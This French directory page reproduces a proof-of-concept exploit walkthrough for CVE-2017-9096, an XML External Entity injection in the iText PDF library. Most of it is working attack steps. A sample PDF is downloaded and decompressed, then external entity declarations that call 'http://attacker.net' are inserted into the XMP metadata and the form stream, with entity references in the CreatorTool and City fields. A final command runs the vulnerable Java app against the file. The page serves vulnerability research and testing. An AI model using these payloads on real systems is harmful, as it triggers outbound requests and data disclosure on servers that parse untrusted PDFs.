Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/jakabakos/cve-2017-9096-itext-xxe
Analyse des VulnérabilitésExploitationExploitation d'Applications WebFuzzingTests d'Intrusion
GitHubjakabakos/cve-2017-9096-itext-xxe

CVE-2017-9096-iText-XXE

Preuve de concept d'exploitation pour CVE-2017-9096 démontrant une injection XML External Entity (XXE) dans la bibliothèque PDF iText via des métadonnées XMP et des champs de formulaire malveillants.

Voir le dépôt
13341il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2017-9096

1. Création du PDF malveillant contenant une XXE

Obtenez un PDF contenant un formulaire :

root@kitploit:~
wget https://www.pdfscripting.com/public/FreeStuff/PDFSamples/ModifySubmit_Example.pdf -O input.pdf

Décompresser le PDF

Pour cela, vous devez décompresser le PDF avec qpdf --qdf --object-streams=disable input.pdf output.pdf, puis vous pouvez modifier le PDF avec un éditeur de texte et ajouter du XML malveillant.

Ajouter les entités externes

Vous pouvez placer une XEE dans les métadonnées XMP à la ligne 77 :

root@kitploit:~
stream
<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?>
<!DOCTYPE foo [ <!ENTITY xxe2 SYSTEM "http://attacker.net" > ]>
<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 4.0-c321 44.398116, Tue Aug 04 2009 14:24:39">

Et bien sûr, ajoutez aussi la référence à un endroit, par exemple à la ligne 88 :

root@kitploit:~
<xap:CreatorTool>Adobe LiveCycle Designer 8.0 &xxe2;</xap:CreatorTool>

Vous pouvez également ajouter une XXE courante au fichier. Voyez cette partie dans le document original (elle commence à la ligne 740) :

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Remplacez-la par ce qui suit :

root@kitploit:~
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.net" > ]>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
endstream
endobj

Ensuite, ajoutez simplement la référence à un endroit, par ex. dans le champ Ville (ligne 1845 du document décompressé original). Remplacez ceci :

root@kitploit:~
<text
>City:</text
></value
>

Par ceci :

root@kitploit:~
<text
>City:</text
><xxe>&xxe;</xxe></value
>

Vous trouverez également dans ce dépôt le PDF modifié contenant les deux XXE (output_with_xxe.pdf)

2. Effectuer l'attaque

Exécutez l'application Java pour tester le PDF avec mvn clean compile exec:java.

Télécharger l’outil